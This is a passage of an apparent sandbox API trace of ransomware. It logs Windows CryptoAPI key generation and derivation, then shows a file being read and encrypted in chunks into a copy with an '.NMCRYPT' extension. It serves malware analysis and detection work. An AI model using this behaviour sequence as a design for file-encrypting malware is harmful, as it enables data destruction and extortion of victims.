hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.648] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.649] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.650] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0154.650] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0154.651] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444764 | out: phHash=0x1d444764) returned 1 [0154.651] CryptHashData (hHash=0x9ad678, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.651] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad678, dwFlags=0x4, phKey=0x1d444768 | out: phKey=0x1d444768*=0x9ad1f8) returned 1 [0154.651] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0154.651] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0154.651] wcslen (_String="\\\\?\\") returned 0x4 [0154.651] CryptDuplicateKey (in: hKey=0x9ad1f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad238) returned 1 [0154.651] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0154.652] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0154.652] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8704) returned 1 [0154.652] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0154.653] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.661] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.661] GetLastError () returned 0x0 [0154.661] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.915] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.915] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.915] GetLastError () returned 0x0 [0154.915] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.915] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.916] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.916] GetLastError () returned 0x0 [0154.916] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.916] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.916] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.916] GetLastError () returned 0x0 [0154.916] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.916] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.916] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.916] GetLastError () returned 0x0 [0154.916] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.916] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.916] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.916] GetLastError () returned 0x0 [0154.916] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.916] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.916] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.916] GetLastError () returned 0x0 [0154.916] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.916] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.916] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.916] GetLastError () returned 0x0 [0154.916] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.916] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.916] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.917] GetLastError () returned 0x0 [0154.917] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.917] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.917] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.917] GetLastError () returned 0x0 [0154.917] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.917] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.917] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.917] GetLastError () returned 0x0 [0154.917] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.917] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.917] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.917] GetLastError () returned 0x0 [0154.917] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.917] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.917] CryptEncrypt (in: 